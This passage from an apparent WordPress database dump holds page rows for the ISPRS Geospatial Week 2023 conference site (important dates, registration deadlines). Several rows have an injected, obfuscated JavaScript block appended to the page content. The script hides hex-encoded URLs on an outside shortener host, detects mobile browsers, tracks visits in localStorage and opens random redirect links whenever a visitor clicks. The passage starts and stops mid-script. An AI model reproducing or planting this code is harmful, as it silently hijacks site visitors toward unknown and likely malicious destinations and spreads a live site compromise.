_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','inherit','closed','closed','','2638-revision-v1','','','2022-10-09 01:24:29','2022-10-09 01:24:29','',2638,'https://gsw2023.com/?p=2653',0,'revision','',0),
(2654,1,'2022-10-09 01:27:39','2022-10-09 01:27:39','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: gray;\"><span style=\"font-size: 18pt;\"><strong>ISPRS Geospatial Week: 2-7 September 2023</strong></span></h5>\n<div class=\"three_quarter first\">\n<div class=\"gap-10\">\n<h5></h5>\n</div>\n</div>\n<div class=\"three_quarter first\">\n<p><strong>Important Dates:</strong></p>\n<ol>\n<li><strong>Annals (Fully Reviewed Papers):</strong>\n<ul>\n<li>Full paper submission (Annals): April 30, 2023</li>\n<li>Full paper Author notification: June 15, 2023</li>\n<li>Camera ready paper submission: July 15, 2023</li>\n</ul>\n</li>\n</ol>\n<p>&nbsp;</p>\n<ol start=\"2\">\n<li><strong>Archives (Abstract Reviewed Papers):</strong>\n<ul>\n<li>Abstracts submission (Archives): May 15, 2023</li>\n<li>Abstracts Author notification: June 15, 2023</li>\n<li>Camera ready paper submission: July 15, 2023</li>\n</ul>\n</li>\n</ol>\n</div>\n<p>&nbsp;</p>\n<div class=\"three_quarter first\">\n<p><strong>Registration deadlines</strong></p>\n<ul>\n<li>Early bird registration deadline: July 1, 2023</li>\n<li>Late registration deadline: July 21, 2023</li>\n</ul>\n</div>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','IMPORTANT DATES','','publish','closed','closed','','important-dates','','','2023-05-24 23:23:37','2023-05-24 23:23:37','',0,'https://gsw2023.com/?page_id=2654',0,'page','',0),
(2656,1,'2022-10-09 01:27:39','2022-10-09 01:27:39','','IMPORTANT DATES','','inherit','closed','closed','','2654-revision-v1','','','2022-10-09 01:27:39','2022-10-09 01:27:39','',2654,'https://gsw2023.com/?p=2656',0,'revision','',0),
(2657,1,'2022-10-09 01:34:17','2022-10-09 01:34:17','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>SPRS Geospatial Week: 2-7 September 2023</strong></h5>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li>\n<h6><strong>Conference web site and Call for papers: March 2022</strong></h6>\n</li>\n</ul>\n</li>\n</ul>\n<h5 style=\"text-align: justify; color: red;\"><strong>Paper submissions</strong></h5>\n<ul class=\"nospace\">\n<li>\n<h6><strong>Full paper submission (Annals): March 2023 (hard deadline, no extension)</strong></h6>\n</li>\n<li>\n<h6><strong>Abstract submission (Archives): April 2023 (hard deadline, no extension)</strong></h6>\n</li>\n<li>\n<h6><strong>Abstract submission (Archives): April 2023 (hard deadline, no extension)</strong></h6>\n</li>\n<li>\n<h6><strong>Full paper Author notification: May 2023</strong></h6>\n</li>\n<li>\n<h6><strong>Camera ready paper submission: July 2023</strong></h6>\n</li>\n</ul>\n<h5 style=\"text-align: justify; color: red;\"><strong>Registration deadlines</strong></h5>\n<ul>\n<li>\n<h6><strong>Early bird registration deadline: May 1, 2023</strong></h6>\n</li>\n<li>\n<h6><strong>Late registration deadline: July 1, 2023</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( 